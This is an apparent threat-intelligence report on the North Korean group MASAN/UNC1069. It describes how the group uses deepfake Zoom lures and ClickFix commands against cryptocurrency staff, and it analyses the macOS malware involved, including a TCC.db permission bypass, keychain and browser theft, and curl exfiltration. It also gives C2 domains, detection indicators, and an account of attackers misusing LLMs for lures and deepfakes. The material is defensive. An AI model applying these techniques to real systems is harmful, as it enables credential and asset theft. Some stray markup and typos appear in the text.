Security researchers and geopolitical risk analysts track the Democratic People’s Republic of Korea (DPRK) as a primary pioneer of state-sponsored financial cybercrime. The Reconnaissance General Bureau (RGB) oversees a sprawling architecture of cyber units tasked with circumventing international sanctions and generating hard currency for the regime’s weapons programs. One specific cluster of activity, identifiĺed by investigators as UNC1069, MASAN, or CryptoCore, demonstrates a highly specialized focus on the cryptocurrency and decentralized finance (DeFi) sectors. This group has operated since at least 2018, evolving from traditional spear-phishing campaigns against financial institutions to the current high-fidelity social engineering operations targeting the Web3 ecosystem. The regime’s reliance on these actors highlights a strategic pivot where digital assets provide a frictionless medium for money laundering and asset exfiltration on a global scale.
The strategic importance of cryptocurrency for the North Korean state remains unparalleled in the history of cyber warfare. Analysts estimate that North Korean hackers stole approximately $1.34 billion in digital assets across 47 incidents in 2024 alone, accounting for 61% of the total amount stolen globally that year. The MASAN cluster contributes to this total by targeting high-value individuals and organizations, including centralized exchanges, software developers at FinTech firms, and executives at venture capital funds. The group’s shift toward the Web3 industry in 2023 reflects an understanding of the vulnerabilities inherent in decentralized protocols and the high-trust environment of the venture capital world.
Attribution in the North Korean cyber landscape often reveals overlapping monikers and shared technical resources. MASAN frequently displays tactics, techniques, and procedures (TTPs) that align with BlueNoroff and the broader Lazarus Group. These clusters share a common directive: the pursuit of financial gain to support the regime’s economic survival. While some investigative teams distinguish UNC1069 by its unique malware families like WAVESHAPER and DEEPBREATH, the underlying strategic alignment points toward a centralized command structure within the RGB.
The Evolution of MASAN (UNC1069/CryptoCore)
The MASAN threat group represents a highly patient and methodical adversary. Unlike less sophisticated actors who rely on automated spray-and-pray techniques, MASAN operators invest significant time in reconnaissance and rapport-building. The group’s history since 2018 shows a progression from targeting South Korean cryptocurrency exchanges to an international footprint that encompasses the United States, Europe, and the Middle East. Analysts identify MASAN by its persistent use of social engineering lures delivered through professional networking platforms and encrypted messaging applications.
The group utilizes compromised social media accounts of legitimate industry professionals to enhance the credibility of its lures. These hijacked accounts often belong to venture capitalists or startup founders, allowing the attacker to approach secondary targets with an established layer of trust. The threat actor leverages the “executive” persona to propose meetings, technical partnerships, or investment opportunities, mirroring the everyday workflows of the cryptocurrency industry.
Recent operations indicate a transition from simple productivity gains via artificial intelligence (AI) to the deployment of novel AI-enabled lures in active operations. The Google Threat Intelligence Group (GTIG) documented this shift in late 2025, noting that MASAN now uses large language models (LLMs) to refine the language of its lures and perform technical research on target environments. This integration of generative AI allows MASAN to scale its operations while maintaining the high quality of its deception.
AI-Enabled Social Engineering
Deception constitutes the core of MASAN’s initial access strategy. The threat actor initiates contact via Telegram, often using the account of a compromised cryptocurrency executive to build rapport with the target. The attacker discusses potential business collaborations for several days or weeks before moving to the next stage of the attack. The rapport-building phase creates a psychological environment where the victim feels safe and professional, lowering their defenses against technical anomalies.
The attacker schedules a 30-minute meeting using Calendly, a legitimate service that provides a sense of professional legitimacy. The Calendly link redirects the victim to a spoofed Zoom environment hosted on actor-controlled infrastructure, such as zoom[.]uswe05[.]us. Within this fake meeting, the actor employs high-fidelity deception techniques, including the reported use of AI-generated deepfake videos. Victims have described seeing a realistic representation of a well-known CEO from another cryptocurrency firm, which reinforces the belief that the meeting is genuine.
Deception continues within the meeting through the simulation of technical issues. The fake video call interface facilitates a ruse where the victim appears to experience audio or connectivity failures. The threat actor uses this “technical friction” to pivot to a ClickFix attack. This methodology tricks the victim into resolving a purported technical problem by executing malicious commands provided on a fake troubleshooting webpage. The psychological relief of “fixing” the meeting audio often blinds the user to the danger of running unverified code on their system.
Exploiting Technical Friction
The ClickFix stage represents the bridge between human deception and technical compromise. MASAN provides the victim with a link to a webpage that displays specific “troubleshooting” commands tailored to the victim’s operating system. For macOS targets, the commands appear to profile the system’s audio hardware and check for software updates. For Windows targets, the commands manipulate the system volume and device enumerators.
The macOS troubleshooting sequence typically includes a critical command that fetches a remote script and pipes it directly into the Zsh shell:
The use of the curl utility to download and immediately execute a script is a classic indicator of a sophisticated downloader. By embedding this command within a string of legitimate-looking system profiling tools like system_profiler SPAudioData, the attacker increases the likelihood that a technical user will perceive the sequence as a standard diagnostic routine.
Windows targets receive a different command sequence designed to execute a malicious HTML application (HTA) via the mshta utility:
The mshta proxy execution technique allows the attacker to bypass certain security controls and run scripts that can launch secondary payloads, such as PowerShell or executable binaries. The inclusion of commands like setx audio_volume 100 further serves the ruse by physically altering the system state to match the purported goal of the troubleshooting.
Stage 1 Malware (WAVESHAPER)
The initial infection chain deploys WAVESHAPER, a packed C++ backdoor designed for macOS. WAVESHAPER functions as a persistent gateway into the compromised host, enabling the threat actor to download and execute arbitrary payloads retrieved from the C2 server. The malware utilizes an unknown packer to obscure its code and hinder automated analysis.
WAVESHAPER initiates its execution by forking into a background daemon process. This technique detaches the malware from the parent terminal session, ensuring that it continues to run even if the victim closes the browser or terminal used during the ClickFix stage. The backdoor leverages the curl library for C2 communication, supporting both HTTP and HTTPS protocols depending on the command-line parameters provided during deployment.
System reconnaissance forms a major part of WAVESHAPER’s initial activity. The malware collects a comprehensive suite of data to profile the victim host, including:
- A unique 16-character alphanumeric UID for tracking the victim.
- The username and machine name to identify the specific target.
- The system time zone and boot time for scheduling and activity tracking.
- A list of recently installed software and hardware model details.
- CPU information and the current operating system version.
- A complete list of running processes to identify security software and potential conflicts.
The malware transmits this data to the C2 server via HTTP POST requests. Payloads retrieved by the backdoor are typically saved to hidden files within the /tmp/ directory, following a regular expression pattern like /tmp/\.[A-Za-z0-9]{6}. This initial footprint provides the actor with the telemetry needed to select subsequent tools based on the victim’s environment and security posture.
Stage 2 Malware (HYPERCALL and HIDDENCALL)
The threat actor pivots from the initial backdoor to more specialized downloaders and interactive tools. HYPERCALL, a Go-based downloader, serves as the primary mechanism for deploying memory-resident payloads. HYPERCALL retrieves malicious dynamic libraries (dylibs) from designated C2 servers and reflectively loads them to minimize the on-disk footprint.
The downloader stores its configuration, including C2 server addresses, in an RC4-encrypted file located at /Library/SystemSettings/.CacheLogs.db. HYPERCALL uses a 16-byte hard-coded RC4 key to decrypt this data. Communication with the C2 infrastructure occurs via WebSockets (WSS), using domains like supportzm[.]com and zmsupport[.]com. After registering with the server, HYPERCALL requests a binary payload for the “darwin” system architecture. The server sends the payload in chunks, which HYPERCALL eventually executes in memory using the NSCreateObjectFileImageFromMemory API.
The primary payload delivered by HYPERCALL is HIDDENCALL, an interactive Go-based backdoor. Analysts identified HIDDENCALL as the component providing “hands-on keyboard” access to the compromised host. Forensic inquiry into the Rosetta cache revealed significant technical details about HIDDENCALL’s capabilities. Because the malware was compiled for x86_64 architecture but executed on ARM-based macOS hardware, the operating system generated Ahead-of-Time (AOT) translation files. These files preserved internal symbols that revealed the malware’s project structure and capabilities.
Symbols identified in the HIDDENCALL AOT file indicate a broad range of malicious functions:
- File system management: _t/common.add_file_to_zip, _t/common.zip_file, _t/common.unzipFile.
- Network and C2 operations: _t/common.rc4_encode, _t/common.resolve_server, _t/common.send_data.
- Interactive shell management: _t/common.rsp_new_shell, _t/common.rsp_exit_shell, _t/common.start_shell_reader.
- Process and system manipulation: _t/common.rsp_inject, _t/common.wipe_file, _t/common.exec_command_with_timeout.
These capabilities allow the threat actor to perform fine-grained data exfiltration, maintain persistent shell access, and modify the system environment in real-time. The shared “t_” function-naming convention and overlapping Go libraries between HYPERCALL and HIDDENCALL strongly suggest a unified development environment managed by MASAN’s malware authors.
DEEPBREATH Analysis
The ultimate goal of the MASAN intrusion is the exfiltration of sensitive credentials and digital assets. DEEPBREATH, a data miner written in Swift, represents the group’s most sophisticated tool for this purpose on the macOS platform. The malware targets the Transparency, Consent, and Control (TCC) database, which is the core security mechanism protecting user privacy on macOS.
DEEPBREATH avoids standard permission prompts by programmatically manipulating the TCC.db file. The malware leverages the Finder application, which possesses Full Disk Access (FDA) permissions, to move and rename the user’s TCC folder. This action allows the malware to stage the TCC.db file in a temporary location where it can inject unauthorized permissions without being challenged by the operating system’s protection mechanisms. After injecting permissions for folders like Desktop, Documents, and Downloads, the malware restores the modified database to its original location.
The integration of AI extends to malware development. Forensic evidence found in stealers associated with MASAN and its affiliates reveals AI-generated comments and script structures. This suggests that the group is using AI to accelerate the coding of its infection chains and to introduce new programpming languages, such as Nim and Swift, into its arsenal with minimal friction. The use of AI-driven automation allows MASAN to manage a high volume of concurrent victims, adjusting its strategies in real-time based on the beaconing activity it receives.
With elevated access secured, DEEPBREATH systematically harvests high-value information:
- Credentials from the user’s Keychain (login.keychain-db).
- Browser data, including cookies, logins, and settings from Google Chrome, Brave, and Microsoft Edge.
- Session and user data from multiple versions of the Telegram application.
- Sensitive information stored in the Apple Notes database.
The malware stages the collected data in a temporary folder, compresses it into a ZIP archive, and exfiltrates the archive using the curl utility. This bypass technique highlights the attacker’s deep understanding of macOS internal security architecture and their ability to exploit default application permissions to circumvent user consent.
CHROMEPUSH Analysis
MASAN complements the host-level data mining of DEEPBREATH with the browser-level exploitation of CHROMEPUSH. CHROMEPUSH is a data miner written in C++ that functions as a malicious browser extension for Chromium-based browsers, including Google Chrome, Brave, Arc, and Microsoft Edge. The malware masquerades as a legitimate extension for editing Google Docs offline to avoid scrutiny from the user.
CHROMEPUSH establishes persistence by installing itself as a native messaging host. The malware copies itself to the user’s Application Support directory and creates a manifest file, com.google.docs.offline.json, which ensures that the browser executes the malicious component automatically upon startup. This mechanism allows the malware to maintain a persistent presence even if the browser’s extension manager is audited.
The capabilities of CHROMEPUSH include:
- Keylogging to capture keystrokes and sensitive input fields.
- Stealing browser cookies and session tokens to facilitate account takeover.
- Capturing screenshots of the user’s desktop at configurable intervals.
The malware reads its configuration from a hidden database file at %HOME%/Library/Application Support/com.apple.os.receipts/setting.db. This configuration controls parameters such as cap_on (screen captures), coo_on (cookie access), and key_on (keylogging). CHROMEPUSH stages the collected data in temporary files with specific prefixes: CA for screenshots, KL for keylogging, and CK for cookies. It then uploads these files to its C2 server, cmailer.pro, via HTTP POST requests.
llSILENCELIFT and SUGARLOADER
MASAN utilizes SILENCELIFT and SUGARLOADER to maintain long-term access and control over the compromised environment. SILENCELIFT is a minimalistic backdoor written in C/C++ that beacons basic host information to the C2 server support-zoom[.]us. It retrieves a unique ID from the file path /Library/Caches/.Logs.db, which is the same location used by CHROMEPUSH, indicating coordination between different malware families.
A unique feature of SILENCELIFT is its ability to manipulate Telegram communications. If the malware runs with root privileges, it can use the pkill -STOP and pkill -CONT commands to freeze and resume the Telegram process. This capability allows the threat actor to silently interrupt the user’s communication, possibly to prevent the user from seeing security alerts or to facilitate the actor’s use of a compromised Telegram account for lateral movement.
SUGARLOADER, a legacy C++ downloader historically associated with MASAN, serves as a fallback persistence mechanism. During recent intrusions, researchers observed the actor using a Launch Daemon, com.apple.system.updater.plist, to execute SUGARLOADER automatically during the system startup process. SUGARLOADER checks for an RC4-encrypted configuration file at /Library/OSRe[span_83](start_span)[span_83](end_span)covery/com.apple.os.config and downloads subsequent payloads from servers such as breakdream[.]com and dreamdie[.]com. The deployment of multiple disparate persistence mechanisms across a single host demonstrates MASAN’s commitment to maintaining a durable foothold.
The Integration of Generative AI in the Adversary Lifecycle
MASAN has transitioned from using AI for basic tasks to integrating it into the core of its operational lifecycle. The group leverages LLMs like Gemini to conduct deep reconnaissance and technical research. Security analysts documented instances where the actor used AI to research specific cryptocurrency concepts and identify the precise file paths for wallet application data on different operating systems.
The actor also uses AI to generate lure materials and other messaging related to cryptocurrency investments. This allows the group to produce convincing professional correspondence in multiple languages, effectively expanding its target pool beyond English-speaking victims. Furthermore, research into MASAN-aligned groups like BlueNoroff suggests that the actors are using GPT-4o models to modify images and generate high-fidelity deepfake content for their video calls.
Forensic Artifacts and Detection Strategies
The absence of enterprise security tools on many target systems does not prevent the reconstruction of MASAN’s activities. Forensic analysts rely on built-in macOS features to identify and track the intrusion. The XProtect Behavioral Service (XBS) logs metadata about programs that violate behavioral rules in an SQLite database at /var/protected/xprotect/XPdb. These logs provide a timestamped sequence of events, allowing investigators to identify malicious binaries even if the attacker has deleted them from the disk.
Rosetta cache analysis provides another critical avenue for investigation. The generation of Ahead-of-Time (AOT) translation files for x86_64 binaries on ARM systems leaves persistent artifacts in /var/db/oah/. These files contain symbols and project paths that can reveal the original names and functions of memory-resident malware like HIDDENCALL. Investigators utilized these artifacts to confirm the relationship between the HYPERCALL downloader and the interactive backdoor components of the intrusion.
Monitoring for behavioral indicators remains the most effective method for detecting MASAN activity in real-time. High-confidence indicators include:
- Executing curl or mshta commands from atypical browser or terminal processes.
- Identifying Launch Daemons with names masquerading as system updates, such as com.apple.system.updater.
- Detecting unauthorized modifications to the TCC.db or the presence of staged database files in /tmp/.
- Observing hidden files and directories in sensitive locations like /Library/SystemSettings/ or ~/Library/Application Support/com.apple.os.receipts/.
- Identifying unusual browser extension manifests and native messaging hosts that do not correspond to known legitimate applications.
Infrastructural Analysis and C2 Operations
MASAN infrastructure demonstrates a reliance on domains that mimic legitimate services to enhance its social engineering lures. The group frequently uses typosquatting or thematic domains, such as zoom[.]uswe05[.]us for fake meetings and supportzm[.]com or zmsupport[.]com for C2 operations. The group also utilizes descriptive domains like mylingocoin[.]com to host its ClickFix payloads and cmailer.pro for data exfiltration.
The group utilizes the RC4 algorithm for configuration encryption across multiple malware families, often with hard-coded keys. This suggests a centralized approach to malware configuration management within the group’s development environment. Furthermore, the usage of WebSockets (WSS) for HYPERCALL communication provides a persistent, low-latency connection for real-time interaction with the victim host.
Analysis of the group’s network activity reveals a methodical approach to data exfiltration. The use of the curl utility to upload ZIP archives allows the actor to leverage a legitimate system tool that is unlikely to be blocked by basic firewalls. The staging of data in hidden directories before exfiltration ensures that the actor can collect a large volume of information without triggering immediate alerts based on unusual file transfers.
Strategic Implications for the Global Cryptocurrency Economy
The activities of the MASAN cluster represent a significant threat to the integrity of the global cryptocurrency market. By targeting centralized exchanges and DeFi platforms, the regime gains access to vast pools of liquid assets that can be rapidly laundered. The group’s focus on session tokens and cookies allows it to bypass multi-factor authentication, demonstrating that even organizations with strong authentication protocols are vulnerable to session hijacking.
The integration of AI into MASAN’s tradecraft significantly lowers the barrier to entry for high-stakes social engineering. As deepfake technology becomes more accessible, the ability to distinguish between legitimate and malicious remote interactions will continue to diminish. This evolution requires the cryptocurrency industry to rethink its trust models, particularly for remote-first environments where business is conducted almost exclusively through video calls and encrypted messaging.
Furthermore, the focus on stealing data from Apple Notes and Telegram sessions highlights the risk of “shadow data” within organizations. Many developers and executives store sensitive information, such as recovery phrases and private keys, in these informal applications, providing a lucrative target for adversaries. The MASAN cluster’s ability to exfiltrate this data illustrates the need for more rigorous data protection policies and the use of secure password managers instead of general-purpose note-taking apps.
Projections and Conclusion
The MASAN cluster will likely continue to refine its AI-enabled tactics, integrating more realistic deepfakes and automated communication tools into its social engineering campaigns. The group’s shift toward the Web3 industry is expected to accelerate as more capital moves into decentralized protocols. Analysts anticipate that the group will also expand its cross-platform capabilities, developing more sophisticated tools for Linux and mobile environments to target a broader range of developers and investors.
Defense against MASAN requires a transition to a zero-trust architecture for all remote communication. Organizations must verify the identity of participants through multiple out-of-band channels and restrict the execution of unverified scripts and commands on employee systems. Technical defenses should focus on behavioral monitoring of system utilities and the rigorous auditing of sensitive operating system databases like the TCC on macOS.
The North Korean regime’s strategic commitment to cyber-financing ensures that MASAN and similar clusters will remain a primary threat to the financial stability of the digital asset sector. Ongoing cooperation between threat intelligence firms, financial institutions, and law enforcement is essential to identifying and disrupting the group’s infrastructure. By understanding the psychological and technical nuances of MASAN’s operations, the global community can better defend against the next generation of AI-enabled financial cybercrime.
The MASAN cluster’s use of high-fidelity deception, sophisticated data miners like DEEPBREATH and CHROMEPUSH, and the persistent integration of generative AI demonstrates a high level of operational maturity. As the threat landscape continues to evolve, the resilience of the cryptocurrency ecosystem will depend on its ability to adapt to these increasingly complex state-sponsored threats. Effective defense must be as adaptive and multifaceted as the adversary itself, combining technical rigor with a deep understanding of the human elements of deception.
Investigation into Russian-speaking forums and platforms like VK and OK reveals that MASAN operators frequently monitor the cybersecurity discourse in these regions to identify new vulnerabilities and techniques. While some search results on these platforms may produce false positives, the threat actor’s choice of monikers and malware names often reflects a desire to blend into the “noise” of popular culture and legitimate software development. This strategy further complicates detection and attribution efforts, as analysts must sift through vast amounts of benign data to identify the subtle signals of a MASAN intrusion.
The regime’s cyber program remains a critical pillar of its national security strategy. By leveraging the MASAN cluster to exfiltrate billions in digital assets, the DPRK demonstrates a clear ability to weaponize the global financial infrastructure for its own ends. The ongoing evolution of MASAN’s tradecraft, from the simple use of Python scripts to the current deployment of Swift and Go-based malware and AI-enabled deepfakes, signals a determined and well-resourced adversary. Continued vigilance and the development of advanced behavioral detection capabilities are the only paths forward in mitigating the impact of this formidable state-sponsored actor.
Strategic analysis suggests that as international sanctions tighten, the frequency and severity of MASAN’s operations will likely increase. The group serves as an essential economic valve for the regime, providing the funds necessary for both elite lifestyle preservation and military modernization. The intersection of geopolitical desperation and high-tech capability makes MASAN one of the most dangerous actors currently operating in the cyber-financial domain. Future defense strategies must account for the regime’s high risk tolerance and its willingness to invest years in a single, high-value intrusion.
The documented case of the fintech entity compromise underscores the vulnerability of even technically proficient organizations to well-executed social engineering. The combination of hijacked executive accounts, professional scheduling via Calendly, and the visual authority of a deepfake CEO created a chain of trust that the victim could not easily break. This incident serves as a stark reminder that in the era of generative AI, seeing and hearing are no longer sufficient for believing. Comprehensive verification and the enforcement of rigid security protocols are the primary safeguards against the encroaching tide of AI-enabled state-sponsored deception.
MASAN’s activity is not an isolated phenomenon but part of a broader trend of state-sponsored actors utilizing the cryptocurrency market as a playground for innovation and exfiltration. The lessons learned from analyzing UNC1069 must be applied broadly across the financial sector to protect against the inevitable proliferation of these techniques to other adversary clusters. As MASAN continues to refine its toolkit and integrate the latest advancements in AI, the security community must remain equally committed to transparency, information sharing, and the development of proactive defense mechanisms.
